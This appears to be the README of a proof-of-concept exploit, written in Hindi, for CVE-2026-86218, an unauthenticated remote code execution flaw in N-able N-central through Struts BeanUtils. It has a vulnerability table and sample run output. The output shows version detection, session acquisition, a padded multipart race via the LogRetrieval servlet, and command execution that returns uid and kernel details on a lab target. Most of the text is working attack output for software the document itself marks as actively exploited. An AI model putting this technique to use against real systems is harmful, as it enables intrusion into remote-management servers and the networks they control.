
CVE-2026-86218 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Struts BeanUtils के माध्यम से N-able N-central में अनऑथेंटिकेटेड RCE है, जिसमें वर्ज़न डिटेक्शन और कमांड एक्ज़ीक्यूशन शामिल है।
| CVE | CVE-2026-86218 |
| CVSS | 10.0 (गंभीर) |
| प्रभावित | N-central ऑन-प्रिमाइसेस < 2026.3.1.14 (Hotfix 3 सहित) |
| ठीक किया गया | 2026.3 Hotfix 4 (build 2026.3.1.14) |
| प्रकट किया गया | 2026-09-05 |
| CWE | CWE-96 (स्टैटिक कोड इंजेक्शन) |
| शोषण | जंगल में सक्रिय (CISA KEV) |
[*] Running version check ...
[*] Detected N-central version: 2026.3.1.10
[*] Vulnerable: True
[*] Target : https://nc.lab:443
[*] Servlet : LogRetrieval
[*] Trigger : https://nc.lab:443/LogRetrieval/WEB-INF/web.xml
[*] Marker : ecbddf8d8fe83376aabb4f1e81efd2d2
[+] JSESSIONID: node01bhudsdf7jmpktsh6e0qhjtsk185448.node0
[*] Padding prefix: 49847 bytes
[*] Body size : 63849 bytes
[*] Split offset : 50241 / 64142
[*] Sent partial request; sleeping 0.35s ...
[*] Helper response: HTTP 200
[*] Sent remaining mutation fields
[*] Mutation response head:
HTTP/1.1 200 OK
[*] Multipart race completed.
[*] Sending payload via LogRetrieval ...
[+] Response:
uid=984(nable) gid=984(nable) groups=984(nable) context=system_u:system_r:unconfined_service_t:s0
Linux nc.lab 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64 x86_64 x86_64 GNU/Linux
ecbddf8d8fe83376aabb4f1e81efd2d2
[+] Marker observed in response — payload launched.